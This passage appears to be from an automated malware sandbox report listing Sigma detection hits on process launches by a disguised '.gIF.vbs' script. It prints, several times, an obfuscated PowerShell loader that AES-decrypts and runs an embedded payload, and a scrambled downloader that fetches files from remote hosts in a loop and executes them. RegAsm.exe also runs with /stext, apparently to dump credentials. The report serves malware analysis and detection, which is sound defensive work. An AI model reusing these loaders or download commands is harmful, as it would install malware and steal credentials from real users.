TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
Source: Process started; Author: Thomas Patzke; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPS
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 7060, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 7060, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 5684, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrfptuyewdgikkwbbqnxbflydidjpkpem", ProcessId: 5792, ProcessName: RegAsm.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createdthingstobefrankwithmeeverywhere.gIF.vbs", ProcessId: 3500, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
